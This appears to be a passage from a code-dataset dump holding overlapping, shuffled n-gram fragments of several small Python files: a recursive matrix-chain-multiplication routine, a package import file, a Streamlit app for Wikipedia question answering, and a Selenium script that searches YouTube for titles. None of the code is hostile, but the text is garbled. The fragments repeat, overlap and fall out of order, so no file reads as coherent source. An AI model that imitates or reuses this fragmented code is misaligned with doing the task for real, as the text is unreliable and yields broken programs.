dimension p[i-1] x p[i] for i =", "parenthesis # placement and return the minimum count for k in range(i, j):", "# Driver program to test above function arr = [1, 2, 3, 4,", "p[k] * p[j]) if count < _min: _min = count # Return minimum", "return 0 _min = sys.maxsize # place parenthesis at different places # between", "<gh_stars>1-10 import sys def 
MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1]", "different places # between first and last matrix, # recursively calculate count of", "+ 1, j) + p[i - 1] * p[k] * p[j]) if count", "i == j: return 0 _min = sys.maxsize # place parenthesis at different", "count return _min # Driver program to test above function arr = [1,", "p[i - 1] * p[k] * p[j]) if count < _min: _min =", "# placement and return the minimum count for k in range(i, j): count", "and return the minimum count for k in range(i, j): count = (MatrixChainOrder(p,", "Return minimum count return _min # Driver program to test above function arr", "dimension p[i-1] x p[i] for i = 1..n ''' if i == j:", "k) + MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k]", "and last matrix, # recursively calculate count of # multiplications for each parenthesis", "j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) +", "the minimum count for k in range(i, j): count = (MatrixChainOrder(p, i, k)", "j) + p[i - 1] * p[k] * p[j]) if count < _min:", "has dimension p[i-1] x p[i] for i = 1..n ''' if i ==", "count of # multiplications for each parenthesis # placement and return the minimum", "< _min: _min = count # Return minimum count return _min # Driver", "minimum count return _min # Driver program to test above function arr =", "for i = 1..n ''' if i == j: return 0 _min =", "_min # Driver program to test above function arr = [1, 2, 3,", "1, j) + p[i - 1] * p[k] * p[j]) if count <", "program to test above function arr = [1, 2, 3, 4, 3] n", "MatrixChainOrder(p, k + 1, j) + p[i - 1] * p[k] * p[j])", "_min = count # Return minimum count return _min # Driver program to", "- 1] * p[k] * p[j]) if count < _min: _min = count", "= len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n - 1))", "matrix, # recursively calculate count of # multiplications for each parenthesis # placement", "[1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications is", "_min: _min = 
count # Return minimum count return _min # Driver program", "= [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number of multiplications", "# between first and last matrix, # recursively calculate count of # multiplications", "# place parenthesis at different places # between first and last matrix, #", "3] n = len(arr) print(\"Minimum number of multiplications is \", MatrixChainOrder(arr, 1, n", "= count # Return minimum count return _min # Driver program to test", "at different places # between first and last matrix, # recursively calculate count", "count < _min: _min = count # Return minimum count return _min #", "count # Return minimum count return _min # Driver program to test above", "parenthesis at different places # between first and last matrix, # recursively calculate", "* p[k] * p[j]) if count < _min: _min = count # Return", "A[i] has dimension p[i-1] x p[i] for i = 1..n ''' if i", "_min = sys.maxsize # place parenthesis at different places # between first and", "def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i] for", "x p[i] for i = 1..n ''' if i == j: return 0", "recursively calculate count of # multiplications for each parenthesis # placement and return", "j): ''' Matrix A[i] has dimension p[i-1] x p[i] for i = 1..n", "range(i, j): count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j)", "function arr = [1, 2, 3, 4, 3] n = len(arr) print(\"Minimum number", "* p[j]) if count < _min: _min = count # Return minimum count", "for each parenthesis # placement and return the minimum count for k in", "MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x p[i] for i", "p[j]) if count < _min: _min = count # Return minimum count return", "return the minimum count for k in range(i, j): count = (MatrixChainOrder(p, i,", "count = (MatrixChainOrder(p, i, k) + MatrixChainOrder(p, k + 1, j) + p[i", "import sys def MatrixChainOrder(p, i, j): ''' Matrix A[i] has dimension p[i-1] x", "= sys.maxsize # place parenthesis at 
different places # between first and last", "+ p[i - 1] * p[k] * p[j]) if count < _min: _min" ]
[ "<reponame>frederikgram/describe from .template_builders import * from .actions import * from .startup import *" ]
[ "1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as", "= e.options # take the first one from the list of ambiguous terms", "first one from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0],", "the summary about the query from wikipedia\" results = wikipedia.search(query) # There could", "paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context =", "\"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query =", "e: ambiguous_terms = e.options # take the first one from the list of", "st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\",", "pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str)", "Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms =", "SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph", "wikipedia\" results = wikipedia.search(query) # There could be more than 1 due to", "to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms", "== '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\",", "question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide", "Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query", "def get_qa_pipeline(): qa_pipeline = 
pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result =", "start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\")", "TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\":", "\"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question", "= st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query)", "__name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration", "could be more than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0],", "wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str:", "try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options #", "get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter", "due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e:", "query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif", "st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if", "= st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\",", "def answer_question(pipeline, question, context): result = 
pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'],", "context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") #", "question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question =", "print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question,", "import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) ->", "from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return", "as e: ambiguous_terms = e.options # take the first one from the list", "question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a valid paragraph\")", "context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']},", "summary about the query from wikipedia\" results = wikipedia.search(query) # There could be", "summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result", "qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context)", "wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first", "take the first one from the list of ambiguous terms and try again", "def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about the", "There could be more than 1 due to Disambiguation issue try: summary =", "the first 
one from the list of ambiguous terms and try again return", "#return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if", "= wikipedia.search(query) # There could be more than 1 due to Disambiguation issue", "return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def", "transformers import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def", "st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context)", ") if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH", "st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary", "explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") #", "= pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return", "== \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if", "{result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ ==", "str: \"Given a query, return the summary about the query from wikipedia\" results", "elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph", "pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") )", "# print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, 
question=question, context=context) st.write(answer['answer'])", "st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\")", "print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except:", "{result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline()", "end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline =", "result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end:", "import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query:", "\"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question:", "add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option ==", "of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline():", "the query from wikipedia\" results = wikipedia.search(query) # There could be more than", "query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty()", "= get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context =", "ambiguous_terms = e.options # take the first one from the list of ambiguous", "= st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) 
paragraph_slot.markdown(context) elif add_select_option", "# print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try:", "if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox(", "\"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\")", "qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score:", "based\": question = st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question", "query, return the summary about the query from wikipedia\" results = wikipedia.search(query) #", "= wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the", "4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question", "get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option", "the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary", "if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\",", "wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one from the", "= pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\"", "paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context = st.text_area(\"Enter the", "== \"Paragraph based\": question = st.empty() context = 
st.text_area(\"Enter the paragraph to explore\",", "= st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query", "str) -> str: \"Given a query, return the summary about the query from", "value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline,", "wikipedia.search(query) # There could be more than 1 due to Disambiguation issue try:", "terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline =", "f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__", "add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\")", "paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question:", "from wikipedia\" results = wikipedia.search(query) # There could be more than 1 due", "summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take", "warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about", "a query, return the summary about the query from wikipedia\" results = wikipedia.search(query)", "get_context_from_wiki(query: str) -> str: \"Given a query, return the summary about the query", "sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one", "more than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except", "ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline", "add_select_option == \"Paragraph based\": 
question = st.empty() context = st.text_area(\"Enter the paragraph to", "context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a", "context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result", "to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\")", "answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)},", "get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question,", "import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query,", "{question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer = answer_question(pipeline, question=question, context=context)", "return the summary about the query from wikipedia\" results = wikipedia.search(query) # There", "{round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive", "about the query from wikipedia\" results = wikipedia.search(query) # There could be more", "\"Given a query, return the summary about the query from wikipedia\" results =", "= st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context:", "result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option =", "import warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) 
-> str: \"Given", "results = wikipedia.search(query) # There could be more than 1 due to Disambiguation", "based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI", "pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return", "be more than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10)", "warnings import streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a", "and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\")", "try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return", "than 1 due to Disambiguation issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError", "question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']}, score: {round(result['score'], 4)}, start:", "st.empty() context = st.text_area(\"Enter the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\")", "pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer:", "wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline,", "= st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context))", "if question: try: answer = answer_question(pipeline, 
question=question, context=context) st.write(answer['answer']) except: st.write(\"Provide a valid", "the paragraph to explore\", value=\"...\") question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") #", "\"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot", "if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question =", "st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\":", "\"Query Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query:", "context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option == \"Paragraph based\": question = st.empty() context", "st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context = get_context_from_wiki(query) paragraph_slot.markdown(context) elif add_select_option ==", "(\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot = st.empty()", "# take the first one from the list of ambiguous terms and try", "sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question,", "issue try: summary = wikipedia.summary(results[0], sentences=10) except wikipedia.DisambiguationError as e: ambiguous_terms = e.options", "again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline", "list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10) return summary def", "query from wikipedia\" results = wikipedia.search(query) # There could be more than 1", "# print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, 
context=context)) if question: try: answer = answer_question(pipeline,", "-> str: \"Given a query, return the summary about the query from wikipedia\"", "Based\": paragraph_slot = st.empty() query = st.text_area(\"WIKI SEARCH TERM\", \"\") if query: context", "'__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query", "{result['start']}, end: {result['end']}\" return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline", "{context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer =", "Options\", (\"Query Based\", \"Paragraph based\") ) if add_select_option == \"Query Based\": paragraph_slot =", "return qa_pipeline def answer_question(pipeline, question, context): result = pipeline(question=question, context=context) #return f\"Answer: {result['answer']},", "question = st.text_input(\"QUESTION\", \"\") # print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question,", "from transformers import pipeline import wikipedia import warnings import streamlit as st warnings.filterwarnings(\"ignore\")", "return result if __name__ == '__main__': st.title(\"Extractive Question Answering\") pipeline = get_qa_pipeline() add_select_option", "# There could be more than 1 due to Disambiguation issue try: summary", "except wikipedia.DisambiguationError as e: ambiguous_terms = e.options # take the first one from", "print(f\"Context: {context}\\n\") # print(f\"Question: {question}\\n\") # print(answer_question(pipeline, question=question, context=context)) if question: try: answer", "score: {round(result['score'], 4)}, start: {result['start']}, end: {result['end']}\" return result if __name__ == '__main__':", "Question Answering\") pipeline = get_qa_pipeline() add_select_option = 
st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph", "one from the list of ambiguous terms and try again return wikipedia.summary(ambiguous_terms[0], sentences=10)", "return summary def get_qa_pipeline(): qa_pipeline = pipeline(\"question-answering\") return qa_pipeline def answer_question(pipeline, question, context):", "streamlit as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return", "Answering\") pipeline = get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\")", "as st warnings.filterwarnings(\"ignore\") def get_context_from_wiki(query: str) -> str: \"Given a query, return the", "= get_qa_pipeline() add_select_option = st.sidebar.selectbox( \"Exploration Options\", (\"Query Based\", \"Paragraph based\") ) if", "e.options # take the first one from the list of ambiguous terms and" ]
[ "import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import", "selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support", "WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID,", "import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import", "= wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator =", "= [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results: print(result.text)", "search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in", "import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver", "import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator", "get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator))", "wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = 
wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result", "(By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator))", "= (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results =", "search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}')", "Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions", "from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome')", "'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click()", "driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\")", "import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait", "from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver,", "selenium.webdriver.support import expected_conditions as EC driver = 
get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20)", "selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory", "<gh_stars>0 from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait", "wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID,", "common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/')", "selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC", "driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box", "'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos:", "WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as EC driver =", "EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search')", "as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID,", "search_btn_locator = (By.ID, 'search-icon-legacy') search_button = 
wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results", "search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button", "By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver", "get_driver from selenium.webdriver.support import expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait =", "= wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for", "= WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator =", "[By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results: print(result.text) driver.quit()", "results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator)) print(f'Titulos: {len(results)}') for result in results:", "20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy')", "from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from selenium.webdriver.support import expected_conditions as", "wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) 
search_box.send_keys(\"<PASSWORD>\") search_btn_locator", "expected_conditions as EC driver = get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator =", "(By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title'] results = wait.until(EC.visibility_of_all_elements_located(results_locator))", "= (By.ID, 'search') search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button =", "from selenium.webdriver.common.by import By from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from", "search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator = [By.ID, 'video-title']", "from selenium.webdriver.support.select import Select from selenium.webdriver.support.wait import WebDriverWait from common.webdriver_factory import get_driver from", "search_box = wait.until(EC.element_to_be_clickable(search_locator)) search_box.send_keys(\"<PASSWORD>\") search_btn_locator = (By.ID, 'search-icon-legacy') search_button = wait.until(EC.element_to_be_clickable(search_btn_locator)) search_button.click() results_locator", "= get_driver('chrome') driver.get('https://www.youtube.com/') wait = WebDriverWait(driver, 20) search_locator = (By.ID, 'search') search_box =" ]
